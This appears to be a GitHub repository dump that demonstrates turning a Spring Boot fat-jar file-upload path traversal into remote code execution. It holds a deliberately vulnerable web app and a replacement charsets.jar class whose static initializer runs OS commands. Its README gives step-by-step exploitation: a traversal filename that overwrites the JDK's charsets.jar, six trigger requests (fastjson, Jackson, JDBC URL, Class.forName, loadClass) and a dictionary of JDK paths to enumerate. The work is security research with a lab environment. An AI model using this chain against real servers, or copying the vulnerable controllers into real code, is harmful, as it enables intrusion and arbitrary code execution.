├── charsets ├── src │ ├── META-INF │ │ └── MANIFEST.MF │ └── sun │ │ └── nio │ │ └── cs │ │ └── ext │ │ ├── IBM33722.java │ │ └── ExtendedCharsets.java └── pom.xml ├── images └── docker.png ├── release └── charsets.jar ├── fatJarWriteFileRCE ├── src │ └── main │ │ ├── resources │ │ ├── application.properties │ │ ├── templates │ │ │ ├── uploadStatus.html │ │ │ ├── upload.html │ │ │ └── index.html │ │ └── static │ │ │ └── jquery.form.min.js │ │ ├── docker │ │ └── Dockerfile │ │ └── java │ │ └── code │ │ └── landgrey │ │ ├── controller │ │ ├── IndexController.java │ │ ├── HelloController.java │ │ ├── ClassForNameController.java │ │ ├── JdbcController.java │ │ ├── ClassLoaderController.java │ │ ├── FastJsonController.java │ │ ├── ListFileController.java │ │ ├── JackSonController.java │ │ └── UploadController.java │ │ ├── Application.java │ │ └── bean │ │ ├── Car.java │ │ └── User.java └── pom.xml ├── .gitignore └── README.md /charsets/src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.7.0_07 (Oracle Corporation) 3 | 4 | -------------------------------------------------------------------------------- /images/docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/HEAD/images/docker.png -------------------------------------------------------------------------------- /release/charsets.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/HEAD/release/charsets.jar -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=18081 2 | server.address=0.0.0.0 3 | 4 | spring.servlet.multipart.max-file-size=10MB 5 | spring.servlet.multipart.max-request-size=10MB 6 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM openjdk:8-jdk-alpine 2 | VOLUME /tmp 3 | ADD ./fatJarWriteFileRCE-1.0-SNAPSHOT.jar /app.jar 4 | EXPOSE 18081 5 | ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar","/app.jar"] 6 | MAINTAINER LandGrey 7 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/templates/uploadStatus.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

文件上传结果

6 | 7 |

8 |

9 |

10 | 11 | 12 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/IndexController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | 6 | @Controller 7 | public class IndexController { 8 | @GetMapping("/") 9 | public String index(){ 10 | return "index"; 11 | } 12 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/Application.java: -------------------------------------------------------------------------------- 1 | package code.landgrey; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Application { 8 | public static void main(String[] args){ 9 | 10 | SpringApplication.run(Application.class,args); 11 | 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /charsets/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | code.landgrey 7 | charsets 8 | pom 9 | 10 | 1.0-SNAPSHOT 11 | 12 | 4.0.0 13 | 14 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # 2 | .idea/ 3 | target/ 4 | charsets/.idea/ 5 | 6 | 7 | # Compiled class file 8 | *.class 9 | 10 | # Log file 11 | *.log 12 | 13 | # BlueJ files 14 | *.ctxt 15 | 16 | # Mobile Tools for Java (J2ME) 17 | .mtj.tmp/ 18 | 19 | # Package Files # 20 | *.war 21 | *.nar 22 | *.ear 23 | *.zip 24 | *.tar.gz 25 | *.rar 26 | 27 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml 28 | hs_err_pid* 29 | *.iml 30 | fatJarWriteFileRCE/src/main/java/code/landgrey/test/test.java 31 | charsets/src/charsets.jar 32 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/HelloController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | @RestController 8 | public class HelloController { 9 | @RequestMapping("/hello") 10 | public String hello(String name){ 11 | if(name == null){ 12 | name = "world"; 13 | } 14 | return "hello " + name + " !"; 15 | } 16 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/templates/upload.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

文件上传

6 | 7 |
8 | 9 | 13 | 14 |
15 | 18 | 19 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/ClassForNameController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | @RestController 8 | @EnableAutoConfiguration 9 | public class ClassForNameController { 10 | @RequestMapping("/classForName") 11 | public String classForName(String name) throws Exception { 12 | if(name == null){ 13 | name = "code.landgrey.bean.Car"; 14 | } 15 | Class clazz = Class.forName(name); 16 | return "you got a " + name + " : =[" + clazz.newInstance().toString() + "]="; 17 | } 18 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/JdbcController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.web.bind.annotation.GetMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | import java.sql.DriverManager; 6 | 7 | @RestController 8 | public class JdbcController { 9 | @GetMapping("/jdbc") 10 | public String JdbcTest(String url){ 11 | try{ 12 | DriverManager.setLoginTimeout(10); 13 | Class.forName("com.mysql.jdbc.Driver"); 14 | DriverManager.getConnection(url); 15 | }catch (Throwable t){ 16 | t.printStackTrace(); 17 | return "jdbc connection failed!"; 18 | } 19 | 20 | return "jdbc connection success!"; 21 | } 22 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/ClassLoaderController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | @RestController 8 | @EnableAutoConfiguration 9 | public class ClassLoaderController { 10 | @RequestMapping("/classLoader") 11 | public String classForName(String name) throws Exception { 12 | if(name == null){ 13 | name = "code.landgrey.bean.User"; 14 | } 15 | Class clazz = Thread.currentThread().getContextClassLoader().loadClass(name); 16 | return "you got a " + name + " : =[" + clazz.newInstance().toString() + "]="; 17 | } 18 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/FastJsonController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 5 | import org.springframework.web.bind.annotation.RequestBody; 6 | import org.springframework.web.bind.annotation.RequestMapping; 7 | import org.springframework.web.bind.annotation.RequestMethod; 8 | import org.springframework.web.bind.annotation.RestController; 9 | 10 | @RestController 11 | @EnableAutoConfiguration 12 | public class FastJsonController { 13 | @RequestMapping(path="/fastjson", method = RequestMethod.POST, produces = "application/json") 14 | public String testFastJson(@RequestBody String json){ 15 | Object o = JSON.parse(json); 16 | return o.toString(); 17 | } 18 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/ListFileController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.web.bind.annotation.GetMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class ListFileController { 8 | @GetMapping("/listFile") 9 | public String listFile() throws Throwable{ 10 | String rs = "/tmp 目录文件列表:
===============================
"; 11 | String line; 12 | java.lang.Process proc = java.lang.Runtime.getRuntime().exec("ls -lt /tmp/"); 13 | java.io.InputStream in = proc.getInputStream(); 14 | java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(in, "UTF-8")); 15 | while( (line = br.readLine()) != null){ 16 | rs += line + "
"; 17 | } 18 | return rs; 19 | } 20 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/bean/Car.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.bean; 2 | 3 | 4 | public class Car{ 5 | private String brand; 6 | private long price; 7 | 8 | public Car(){ 9 | 10 | } 11 | 12 | public Car(String brand){ 13 | this.brand = brand; 14 | } 15 | 16 | public Car(String brand, long price){ 17 | this.brand = brand; 18 | this.price = price; 19 | } 20 | 21 | public long getPrice() { 22 | return price; 23 | } 24 | 25 | public String getBrand() { 26 | return brand; 27 | } 28 | 29 | public void setBrand(String brand) { 30 | this.brand = brand; 31 | } 32 | 33 | public void setPrice(long price) { 34 | this.price = price; 35 | } 36 | 37 | @Override 38 | public String toString() { 39 | return " [brand: '" + brand + "', price: '" + price + "'] "; 40 | } 41 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/JackSonController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import code.landgrey.bean.User; 4 | import com.fasterxml.jackson.core.JsonProcessingException; 5 | import com.fasterxml.jackson.databind.ObjectMapper; 6 | import org.springframework.beans.factory.annotation.Autowired; 7 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 8 | import org.springframework.web.bind.annotation.RequestBody; 9 | import org.springframework.web.bind.annotation.RequestMapping; 10 | import org.springframework.web.bind.annotation.RequestMethod; 11 | import org.springframework.web.bind.annotation.RestController; 12 | 13 | @RestController 14 | @EnableAutoConfiguration 15 | public class JackSonController { 16 | @Autowired 17 | private ObjectMapper objectMapper; 18 | 19 | @RequestMapping(path="/jackson", method = RequestMethod.POST) 20 | public String testJackSon(@RequestBody String json) throws Throwable { 21 | objectMapper.enableDefaultTyping(); 22 | Object o = objectMapper.readValue(json, Object.class); 23 | return o.toString(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /charsets/src/sun/nio/cs/ext/IBM33722.java: -------------------------------------------------------------------------------- 1 | package sun.nio.cs.ext; 2 | 3 | import java.util.UUID; 4 | 5 | 6 | public class IBM33722 { 7 | static { 8 | fun(); 9 | } 10 | 11 | public IBM33722(){ 12 | fun(); 13 | } 14 | 15 | private static java.util.HashMap fun(){ 16 | String[] command; 17 | String random = UUID.randomUUID().toString().replace("-","").substring(1,9); 18 | String osName = System.getProperty("os.name"); 19 | if (osName.startsWith("Mac OS")) { 20 | command = new String[]{"/bin/bash", "-c", "open -a Calculator"}; 21 | } else if (osName.startsWith("Windows")) { 22 | command = new String[]{"cmd.exe", "/c", "calc"}; 23 | } else { 24 | if(new java.io.File("/bin/bash").exists()){ 25 | command = new String[]{"/bin/bash", "-c", "touch /tmp/charsets_test_" + random + ".log"}; 26 | }else{ 27 | command = new String[]{"/bin/sh", "-c", "touch /tmp/charsets_test_" + random + ".log"}; 28 | } 29 | } 30 | try{ 31 | java.lang.Runtime.getRuntime().exec(command); 32 | }catch (Throwable e1){ 33 | e1.printStackTrace(); 34 | } 35 | return null; 36 | } 37 | 38 | 39 | } 40 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/bean/User.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.bean; 2 | 3 | public class User { 4 | private String name; 5 | private Integer age; 6 | private Car car; 7 | private Object secret; 8 | 9 | public User(){ 10 | 11 | } 12 | 13 | public User(String name){ 14 | this.name = name; 15 | } 16 | 17 | public void setName(String name) { 18 | this.name = name; 19 | } 20 | 21 | public String getName() { 22 | return name; 23 | } 24 | 25 | public void setAge(Integer age) { 26 | this.age = age; 27 | } 28 | 29 | public Integer getAge() { 30 | return age; 31 | } 32 | 33 | public void setCar(Car car) { 34 | this.car = car; 35 | } 36 | 37 | public Car getCar() { 38 | return car; 39 | } 40 | 41 | public Object getSecret() { 42 | return secret; 43 | } 44 | 45 | public void setSecret(Object secret) { 46 | this.secret = secret; 47 | } 48 | 49 | @Override 50 | public String toString() { 51 | if(car != null && secret != null){ 52 | return "name: '" + name + "', age: '" + age + "', car: '" + car.toString() + "', secret: '" + secret.toString() + "'"; 53 | } 54 | return "name: '" + name + "', age: '" + age + "'"; 55 | } 56 | 57 | } 58 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/resources/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

SpringBoot FatJar 文件上传漏洞到 RCE

4 | 5 |
6 |

系统功能：

7 |

8 |

12 |

13 | 14 |
15 |

源码及参考：

16 |

17 | https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks 18 |

19 | 20 |
21 | 24 | 25 | 28 | 29 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /fatJarWriteFileRCE/src/main/java/code/landgrey/controller/UploadController.java: -------------------------------------------------------------------------------- 1 | package code.landgrey.controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | import org.springframework.web.bind.annotation.PostMapping; 6 | import org.springframework.web.bind.annotation.RequestParam; 7 | import org.springframework.web.multipart.MultipartFile; 8 | import org.springframework.web.servlet.mvc.support.RedirectAttributes; 9 | 10 | import java.io.IOException; 11 | import java.nio.file.Files; 12 | import java.nio.file.Path; 13 | import java.nio.file.Paths; 14 | 15 | @Controller 16 | public class UploadController { 17 | @GetMapping("/uploadIndex") 18 | public String uploadPage(){ 19 | return "upload"; 20 | } 21 | 22 | @GetMapping("/uploadStatus") 23 | public String uploadStatus() { 24 | return "uploadStatus"; 25 | } 26 | 27 | @PostMapping("/upload") 28 | public String singleFileUpload(@RequestParam("file") MultipartFile file, RedirectAttributes redirectAttributes) { 29 | if (file.isEmpty()) { 30 | redirectAttributes.addFlashAttribute("message", "请选择文件上传"); 31 | return "redirect:uploadStatus"; 32 | } 33 | 34 | try { 35 | byte[] bytes = file.getBytes(); 36 | Path path = Paths.get("/tmp/" + file.getOriginalFilename()); 37 | Files.write(path, bytes); 38 | 39 | redirectAttributes.addFlashAttribute("message", "上传成功！'" + file.getOriginalFilename() + "'"); 40 | 41 | } catch (IOException e) { 42 | redirectAttributes.addFlashAttribute("message", "Server throw IOException"); 43 | e.printStackTrace(); 44 | } 45 | return "redirect:/uploadStatus"; 46 | } 47 | 48 | } -------------------------------------------------------------------------------- /fatJarWriteFileRCE/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | code.landgrey 8 | fatJarWriteFileRCE 9 | 1.0-SNAPSHOT 10 | 11 | 12 | org.springframework.boot 13 | spring-boot-starter-parent 14 | 2.2.1.RELEASE 15 | 16 | 17 | 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.springframework.boot 24 | spring-boot-starter-web 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | org.springframework.boot 40 | spring-boot-starter-thymeleaf 41 | 42 | 43 | 44 | com.alibaba 45 | fastjson 46 | 1.2.76 47 | 48 | 49 | 50 | mysql 51 | mysql-connector-java 52 | 5.1.48 53 | 54 | 55 | 56 | 57 | 58 | 59 | org.springframework.boot 60 | spring-boot-maven-plugin 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## spring-boot-upload-file-lead-to-rce-tricks 2 | 3 | ### 一. 原理文章 4 | 5 | [Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索](https://landgrey.me/blog/22/) 6 | 7 | 8 | 9 | ### 二. docker 漏洞环境搭建 10 | 11 | ``` 12 | docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 13 | docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 14 | ``` 15 | 16 | 17 | 完成后访问 http://127.0.0.1:18081/ ，界面大概如下所示： 18 | 19 | ![](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/raw/main/images/docker.png) 20 | 21 | 22 | 23 | ### 三. docker 漏洞环境的功能 24 | 25 | - 文件上传功能 (默认上传到 /tmp/ 目录，可跳目录） 26 | - 列目录功能 (列出 /tmp/ 目录下文件) 27 | 28 | 29 | 30 | ### 四. 漏洞利用条件 31 | 32 | - 可以获得 jdk 安装的 home 目录位置 33 | - 可参考**附录**常见的 jdk lib 默认目录位置，然后使用字典枚举尝试 34 | 35 | - jdk 自带文件 `/jre/lib/***.jar` 没被 `Opened` 过 36 | - 以 charsets.jar 文件举例：程序代码中不使用 `Charset.forName("GBK")` 类似的调用，默认就不会 `Opened` charsets.jar 文件 37 | - ⚠️ 值得注意的是，只能主动触发一次 `Opened` **.jar 文件，如果漏洞利用没有成功，则同名 jar 文件就不能再利用了 38 | 39 | 40 | 41 | ### 五. 漏洞利用步骤 42 | 43 | 1. 选择上传文件 [charsets.jar](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks/raw/main/release/charsets.jar) 44 | 45 | 2. 使用上传文件功能，上传时用 burpsuite 截住数据包，filename 修改为 `../../usr/lib/jvm/java-1.8-openjdk/jre/lib/charsets.jar` 46 | 47 | 3. 上传成功后使用**漏洞利用场景**里的数据包触发漏洞 48 | 49 | 4. 漏洞触发成功会在 /tmp/ 目录产生 charsets_test_[random-string].log 样式名字的文件 50 | 51 | 5. 最后使用列目录功能查看漏洞利用是否成功 52 | 53 | 54 | 55 | ### 六. 漏洞利用场景：(6 个) 56 | 57 | 欢迎提 issue 补充👏～ 58 | 59 | #### 0. spring 原生场景 60 | 61 | spring 框架自带的一条利用链，细节分析见[参考文章](https://landgrey.me/blog/22/)。 62 | 63 | 触发漏洞数据包： 64 | 65 | ``` 66 | GET / HTTP/1.1 67 | Accept: text/html;charset=GBK 68 | 69 | 70 | ``` 71 | 72 | 73 | 74 | #### 1. fastjson 最新版(目前是 1.2.76)默认配置场景 75 | 76 | 正常数据包： 77 | 78 | ``` 79 | POST /fastjson HTTP/1.1 80 | Content-Type: application/json 81 | 82 | {"name":"test"} 83 | ``` 84 | 85 | 触发漏洞数据包： 86 | 87 | ``` 88 | POST /fastjson HTTP/1.1 89 | Content-Type: application/json 90 | 91 | { 92 | "x":{ 93 | "@type":"java.nio.charset.Charset", 94 | "val":"500" 95 | } 96 | } 97 | ``` 98 | 99 | 100 | 101 | #### 2. jackson 开启 enableDefaultTyping 场景 102 | 103 | 正常数据包： 104 | 105 | ``` 106 | POST /jackson HTTP/1.1 107 | Content-Type: application/json 108 | 109 | ["code.landgrey.bean.User",{"name":"zhangsan","age":20,"car":{"brand":"daben","price":1000000},"secret":"Pas@5w0rd"}] 110 | ``` 111 | 112 | 触发漏洞数据包： 113 | 114 | ``` 115 | POST /jackson HTTP/1.1 116 | Content-Type: application/json 117 | 118 | ["sun.nio.cs.ext.IBM33722",{"x":"y"}] 119 | ``` 120 | 121 | 122 | 123 | #### 3. jdbc url getConnection 场景 124 | 125 | 正常数据包： 126 | 127 | ``` 128 | GET /jdbc?url=jdbc:mysql://127.0.0.1:3306/test?user=root&password=123456 129 | ``` 130 | 131 | 触发漏洞数据包： 132 | 133 | ``` 134 | GET /jdbc?url=jdbc:mysql://127.0.0.1:3306/test?statementInterceptors=sun.nio.cs.ext.IBM33722 135 | ``` 136 | 137 | 138 | 139 | #### 4. Class forName 场景 140 | 141 | 正常数据包： 142 | 143 | ``` 144 | GET /classForName?name=code.landgrey.bean.Car 145 | ``` 146 | 147 | 触发漏洞数据包： 148 | 149 | ``` 150 | GET /classForName?name=sun.nio.cs.ext.IBM33722 151 | ``` 152 | 153 | 154 | 155 | #### 5. loadClass newInstance 场景 156 | 157 | 正常数据包： 158 | 159 | ``` 160 | GET /classLoader?name=code.landgrey.bean.User 161 | ``` 162 | 163 | 触发漏洞数据包： 164 | 165 | ``` 166 | GET /classLoader?name=sun.nio.cs.ext.IBM33722 167 | ``` 168 | 169 | 170 | 171 | ### 附录. 常见 JDK lib 目录收集 172 | 173 | 欢迎提 issue 补充👏～ 174 | 175 | ``` 176 | /usr/lib/jvm/jre/lib/ 177 | /usr/local/jdk/jre/lib/ 178 | /usr/local/openjdk-6/lib/ 179 | /usr/local/openjdk-7/lib/ 180 | /usr/local/openjdk-8/lib/ 181 | /usr/lib/jvm/java/jre/lib/ 182 | /usr/lib/jvm/jdk6/jre/lib/ 183 | /usr/lib/jvm/jdk7/jre/lib/ 184 | /usr/lib/jvm/jdk8/jre/lib/ 185 | /usr/lib/jvm/jdk-11.0.3/lib/ 186 | /usr/lib/jvm/jdk1.6/jre/lib/ 187 | /usr/lib/jvm/jdk1.7/jre/lib/ 188 | /usr/lib/jvm/jdk1.8/jre/lib/ 189 | /usr/local/openjdk6/jre/lib/ 190 | /usr/local/openjdk7/jre/lib/ 191 | /usr/local/openjdk8/jre/lib/ 192 | /usr/local/openjdk-6/jre/lib/ 193 | /usr/local/openjdk-7/jre/lib/ 194 | /usr/local/openjdk-8/jre/lib/ 195 | /mnt/jdk/jdk1.8.0_191/jre/lib/ 196 | /usr/lib/jvm/jdk1.6.0/jre/lib/ 197 | /usr/lib/jvm/jdk1.7.0/jre/lib/ 198 | /usr/lib/jvm/jdk1.8.0/jre/lib/ 199 | /usr/java/jdk1.8.0_111/jre/lib/ 200 | /usr/java/jdk1.8.0_121/jre/lib/ 201 | /usr/lib/jvm/java-6-oracle/lib/ 202 | /usr/lib/jvm/java-7-oracle/lib/ 203 | /usr/lib/jvm/java-8-oracle/lib/ 204 | /usr/lib/jvm/java-1.6.0/jre/lib/ 205 | /usr/lib/jvm/java-1.7.0/jre/lib/ 206 | /usr/lib/jvm/java-1.8.0/jre/lib/ 207 | /usr/lib/jvm/jdk1.7.0_51/jre/lib/ 208 | /usr/lib/jvm/jdk1.7.0_76/jre/lib/ 209 | /usr/lib/jvm/jdk1.8.0_60/jre/lib/ 210 | /usr/lib/jvm/jdk1.8.0_66/jre/lib/ 211 | /usr/lib/jvm/jdk1.8.0_74/jre/lib/ 212 | /usr/lib/jvm/jdk1.8.0_91/jre/lib/ 213 | /usr/lib/jvm/oracle_jdk6/jre/lib/ 214 | /usr/lib/jvm/oracle_jdk7/jre/lib/ 215 | /usr/lib/jvm/oracle_jdk8/jre/lib/ 216 | /usr/lib/jvm/jdk1.8.0_101/jre/lib/ 217 | /usr/lib/jvm/jdk1.8.0_102/jre/lib/ 218 | /usr/lib/jvm/jdk1.8.0_111/jre/lib/ 219 | /usr/lib/jvm/jdk1.8.0_131/jre/lib/ 220 | /usr/lib/jvm/jdk1.8.0_144/jre/lib/ 221 | /usr/lib/jvm/jdk1.8.0_151/jre/lib/ 222 | /usr/lib/jvm/jdk1.8.0_152/jre/lib/ 223 | /usr/lib/jvm/jdk1.8.0_161/jre/lib/ 224 | /usr/lib/jvm/jdk1.8.0_171/jre/lib/ 225 | /usr/lib/jvm/jdk1.8.0_172/jre/lib/ 226 | /usr/lib/jvm/jdk1.8.0_181/jre/lib/ 227 | /usr/lib/jvm/jdk1.8.0_191/jre/lib/ 228 | /usr/lib/jvm/jdk1.8.0_202/jre/lib/ 229 | /usr/lib/jvm/jdk8u202-b08/jre/lib/ 230 | /usr/lib/jvm/jre-6-oracle-x64/lib/ 231 | /usr/lib/jvm/jre-7-oracle-x64/lib/ 232 | /usr/lib/jvm/jre-8-oracle-x64/lib/ 233 | /usr/lib/jvm/zulu-6-amd64/jre/lib/ 234 | /usr/lib/jvm/zulu-7-amd64/jre/lib/ 235 | /usr/lib/jvm/zulu-8-amd64/jre/lib/ 236 | /usr/lib/jvm/java-6-oracle/jre/lib/ 237 | /usr/lib/jvm/java-7-oracle/jre/lib/ 238 | /usr/lib/jvm/java-8-oracle/jre/lib/ 239 | /usr/jdk/instances/jdk1.6.0/jre/lib/ 240 | /usr/jdk/instances/jdk1.7.0/jre/lib/ 241 | /usr/jdk/instances/jdk1.8.0/jre/lib/ 242 | /usr/lib/jvm/j2re1.6-oracle/jre/lib/ 243 | /usr/lib/jvm/j2re1.7-oracle/jre/lib/ 244 | /usr/lib/jvm/j2re1.8-oracle/jre/lib/ 245 | /usr/lib/jvm/java-1.6.0-sun/jre/lib/ 246 | /usr/lib/jvm/java-1.7.0-sun/jre/lib/ 247 | /usr/lib/jvm/java-1.8.0-sun/jre/lib/ 248 | /usr/lib/jvm/java-6-openjdk/jre/lib/ 249 | /usr/lib/jvm/java-7-openjdk/jre/lib/ 250 | /usr/lib/jvm/java-8-openjdk/jre/lib/ 251 | /usr/lib/jvm/j2sdk1.6-oracle/jre/lib/ 252 | /usr/lib/jvm/j2sdk1.7-oracle/jre/lib/ 253 | /usr/lib/jvm/j2sdk1.8-oracle/jre/lib/ 254 | /usr/lib/jvm/java-11-openjdk/jre/lib/ 255 | /usr/lib/jvm/java-12-openjdk/jre/lib/ 256 | /usr/lib/jvm/java-13-openjdk/jre/lib/ 257 | /usr/lib/jvm/java-1.6-openjdk/jre/lib/ 258 | /usr/lib/jvm/java-1.7-openjdk/jre/lib/ 259 | /usr/lib/jvm/java-1.8-openjdk/jre/lib/ 260 | /usr/lib/jvm/java-9-openjdk-amd64/lib/ 261 | /usr/lib/jvm/jdk-6-oracle-x64/jre/lib/ 262 | /usr/lib/jvm/jdk-7-oracle-x64/jre/lib/ 263 | /usr/lib/jvm/jdk-8-oracle-x64/jre/lib/ 264 | /usr/lib/jvm/jre-6-oracle-x64/jre/lib/ 265 | /usr/lib/jvm/jre-7-oracle-x64/jre/lib/ 266 | /usr/lib/jvm/jre-8-oracle-x64/jre/lib/ 267 | /usr/lib/jvm/java-10-openjdk-amd64/lib/ 268 | /usr/lib/jvm/java-11-openjdk-amd64/lib/ 269 | /usr/lib/jvm/java-1.11.0-openjdk/jre/lib/ 270 | /usr/lib/jvm/java-1.12.0-openjdk/jre/lib/ 271 | /usr/lib/jvm/java-6-openjdk-i386/jre/lib/ 272 | /usr/lib/jvm/java-6-sun-1.6.0.16/jre/lib/ 273 | /usr/lib/jvm/java-6-sun-1.6.0.20/jre/lib/ 274 | /usr/lib/jvm/java-7-openjdk-i386/jre/lib/ 275 | /usr/lib/jvm/java-8-openjdk-i386/jre/lib/ 276 | /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/ 277 | /usr/lib/jvm/java-7-openjdk-amd64/jre/lib/ 278 | /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 279 | /usr/lib/jvm/java-1.6.0-oracle-x64/jre/lib/ 280 | /usr/lib/jvm/java-1.7.0-oracle-x64/jre/lib/ 281 | /usr/lib/jvm/java-1.8.0-oracle-x64/jre/lib/ 282 | /usr/lib/jvm/oracle-java6-jdk-amd64/jre/lib/ 283 | /usr/lib/jvm/oracle-java7-jdk-amd64/jre/lib/ 284 | /usr/lib/jvm/oracle-java8-jdk-amd64/jre/lib/ 285 | /usr/lib64/jvm/java-1.6.0-ibd-1.6.0/jre/lib/ 286 | /usr/lib64/jvm/java-1.6.0-ibm-1.6.0/jre/lib/ 287 | /usr/lib64/jvm/java-1.7.1-ibm-1.7.1/jre/lib/ 288 | /usr/lib/jvm/java-1.6.0-sun-1.6.0.11/jre/lib/ 289 | /usr/lib/jvm/java-1.6.0-openjdk-amd64/jre/lib/ 290 | /usr/lib/jvm/java-1.7.0-openjdk-amd64/jre/lib/ 291 | /usr/lib/jvm/java-1.8.0-openjdk-amd64/jre/lib/ 292 | /usr/lib/jvm/jre-1.6.0-openjdk.x86_64/jre/lib/ 293 | /usr/lib/jvm/jre-1.7.0-openjdk.x86_64/jre/lib/ 294 | /usr/lib/jvm/jre-1.8.0-openjdk.x86_64/jre/lib/ 295 | /usr/lib/jvm/java-1.11.0-openjdk-amd64/jre/lib/ 296 | /usr/lib/jvm/jdk-8-oracle-arm-vfp-hflt/jre/lib/ 297 | /usr/lib64/jvm/java-1.6.0-openjdk-1.6.0/jre/lib/ 298 | /usr/lib64/jvm/java-1.7.0-openjdk-1.7.0/jre/lib/ 299 | /usr/lib64/jvm/java-1.8.0-openjdk-1.8.0/jre/lib/ 300 | /usr/lib/jvm/java-1.6.0-openjdk-1.6.0.0.x86_64/jre/lib/ 301 | /usr/lib/jvm/java-1.7.0-openjdk-1.8.0.0.x86_64/jre/lib/ 302 | /usr/lib/jvm/java-1.8.0-amazon-corretto.x86_64/jre/lib/ 303 | /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.0.x86_64/jre/lib/ 304 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.45.x86_64/jre/lib/ 305 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.65.x86_64/jre/lib/ 306 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.75.x86_64/jre/lib/ 307 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.79.x86_64/jre/lib/ 308 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.91.x86_64/jre/lib/ 309 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.101.x86_64/jre/lib/ 310 | /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191.x86_64/jre/lib/ 311 | 